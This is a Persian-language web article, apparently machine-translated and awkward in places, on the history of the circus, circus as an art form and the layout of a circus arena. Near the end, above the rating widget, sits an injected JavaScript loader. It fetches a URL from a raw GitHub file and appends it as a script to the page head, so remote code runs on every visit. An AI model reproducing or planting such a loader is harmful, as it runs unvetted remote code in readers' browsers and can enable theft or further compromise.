سیرک

  • ظاهر سیرک

    نام “سیرک” از مناطق بیضی رومی، جایی که جشنواره های مختلف، مسابقات برگزار شد، نشان داده شد. در آن روزها رومی ها دوست داشتند مردم را در قدرت، مهارت، مهارت های مختلف رقابت کنند. بنابراین یک نوع خاص از عینک وجود دارد که امروزه آن سیرک نامیده می شود. اما همانطور که می دانیم و او را دوست داریم، او تنها در قرن هجدهم تبدیل شد. در پاریس، یک ساختمان ویژه دور ساخته شده است تا نشان دهد هنر جیگیتوکی و طرح های آکروباتیک. بعدها، ایتالیایی ها این ایده را به دست می آورند و اجرای برنامه ها را با حیوانات و میمون ها به برنامه اضافه می کنند. سیرک در روسیه در اواخر قرن 18 شناخته شده است. در سال 1764 یک سوار انگلیسی با تور با مسکو دیدار کرد و این نمایش آغاز شروع چند سیر ایستاده را آغاز کرد. در اواسط قرن نوزدهم، چنین سایت هایی در بسیاری از شهرهای روسیه ساخته شده اند. به تدریج محدوده این نمایش گسترش یافت، برنامه های سنتی شکل گرفت و حرفه های سیرک توسعه یافت. کلبه هنر مدرن یک سنتز پیچیده از سرگرمی، هنر، مدیریت و صنعت فن آوری است.

    سیرک به شکل هنری

    محققان، ریشه های سیرک در مسابقات باستانی را در قدرت و مهارت می بینند. این به عنوان راهی برای نشان دادن مهارت های ویژه شکل گرفت که اغلب کاربرد عملی نداشت. در حقیقت متخصصانی که کلبه هنر را به عنوان یک هنر مشخص می کنند، در ابتدا توجه کمتری به عملکرد هنرمندان دارند. آنها رقابت نمیکنند و جوایز را به دست می آورند، یعنی به شما اجازه می دهد که امکانات شخصی و لذت زیبایی را تجربه کنید. ابزار اصلی بیان هنر سیرک یک ترفند است، طراحی شده است تا احساسات را در مخاطبان موجب شود: خنده، تعجب، ترس، لذت. همه این باعث می شود که سیرک شبیه سایر انواع هنرهای تجسمی است: تئاتر، سینما. در عرصه، یک فرد توانایی طبیعت را به دگرگون کردن، نشان می دهد، تنها هدف این تحولات، سنگ، خاک رس یا رنگ نیست، بلکه شخص خودش است. او با توجه به قوانین بی حد و حصر ایجاد می کند و بالاترین امکانات انسان را نشان می دهد. دسته های زیبایی شناسی اصلی هنر سیرک عبارتند از: reprise، ترفند، تعداد، کار فوق العاده، بی نظمی.

    دستگاه کلبه هنر

    برای هنر ویژه، شما نیاز به یک فضای خاص دارید. سیرک نه فقط یک ساختمان دور است، بلکه یک ساختار پیچیده با امکانات فراوان است. عرصه سیرک قلب سایت. به طور سنتی، آن دور شکل، حدود 13 متر قطر است. از صحنه آمفی تئاتر کرسی تماشاگران را افزایش می دهد. در سیرک های مدرن ثابت، اغلب عرصه های مختلفی برای انواع مختلف نمایندگی وجود دارد: سوارکاری، توهم، نور، یخ، آب. اما عرصه فقط بخش قابل توجهی از سیرک است. پشت صحنه فضای بسیار زیادی از دفتر هستند: اتاق های آرایش، اتاق های تمرینی، مکان های نگهداری حیوانات، لباس ها. همچنین خدمات فنی نقش بسیار مهمی را در ساخت تئاتر ایفا می کند: نور، وسایل، دکوراسیون، پرده ها – این همه در خدمت تماشای نمایشگر یک ایده غیر معمول و پیچیده است.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید